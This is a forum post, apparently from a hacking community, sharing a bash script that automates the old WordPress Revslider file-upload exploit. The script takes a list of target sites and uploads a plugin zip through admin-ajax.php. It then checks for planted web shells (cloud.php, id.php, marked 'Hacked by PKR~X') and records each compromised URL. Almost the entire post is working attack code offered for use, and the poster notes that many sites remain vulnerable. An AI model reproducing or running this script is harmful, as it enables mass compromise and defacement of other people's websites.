[bash] Revslider Auto Exploit (1 Viewer)

alfabetovirtual

alfabetovirtual

HACKER
Joined
Mar 11, 2016
Credits
0
Rating - 0%
Wordpress Revslider Exploit ( old exploit , but still have a lot sites with that POC )

Code: 
!/bin/bash
#coded = Gantengers Crew
#Please download the file first revslider.zip

UploadREV(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/resp.txt \
    -H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
    -H "Accept-Language: en-us,en;q=0.5" \
    -H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" \
    -F "client_action=update_plugin" \
    -F "action=revslider_ajax_action" \
    -F "[email protected]" \
    --request POST "http://${1}/wp-admin/admin-ajax.php"
}
CKDFC(){
curl --silent --max-time 10 --connect-timeout 10 "http://${1}/id.php" -o tmp/cdfc.txt
if [ ! -f tmp/cdfc.txt ];then
  echo "[+] $urlnya : RTO"
  continue
fi
  cat tmp/cdfc.txt | grep -i "Hacked by PKR~X" > /dev/null;cdfc=$?
if [ $cdfc -eq 0 ];then
  echo "[+] Uploading shell"
  echo "[+] ${XHOST}/id.php : Upload shell success "
  echo "http://${1}/id.php" >> shell.txt
  else
  echo "[+] $urlnya : Upload shell failed"
fi
rm -f tmp/cdfc.txt
}
CD(){
curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-content/plugins/revslider/temp/update_extract/revslider/cloud.php" -o tmp/cd.txt
if [ ! -f tmp/cd.txt ];then
  echo "[+] $urlnya : RTO"
  continue
fi
  cat tmp/cd.txt | grep -i "Successfull Shell Uploaded" > /dev/null;cd=$?
if [ $cd -eq 0 ];then
  echo "[+] ${XHOST}/ : Exploit successfully "
  echo "http://${1}/wp-content/plugins/revslider/temp/update_extract/revslider/cloud.php" >> success.txt
  CKDFC $urlnya
  else
  echo "[+] $urlnya : exploit failed"
fi
rm -f tmp/cd.txt
}
Exp(){
for url in `cat $list`
do
urlnya=$(echo $url | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | awk '{gsub("//","/")}1' | awk '{gsub("//","/")}1')
XHOST=$(echo $url | awk '{gsub("http://","")}2' | awk '{gsub("https://","")}2' | awk '{gsub("//","/")}2' | awk '{gsub("//","/")}2' | awk '{gsub("/","")}2')
if [ ! -f load.txt ];then
  touch load.txt
fi
  cat load.txt | grep "$urlnya" > /dev/null;ccl=$?
if [ $ccl -eq 1 ];then
  echo $urlnya >> load.txt
  else
  #udah pernah di load di file load.txt
  #kalau mau load ulang,silakan hapus file load.txt
  continue
fi
UploadREV $urlnya
CD $urlnya
done
}
Lengkap(){
if [ ! -d tmp ];then
  mkdir tmp
fi
if [ ! -f $list ];then
  echo "[?] file $list gak ada"
  exit
fi
}
read -p "[+] Enter list target = " list
Lengkap
Exp
 
You must log in or register to reply here.

Users who are viewing this thread

Total: 2 (members: 0, guests: 2)
Top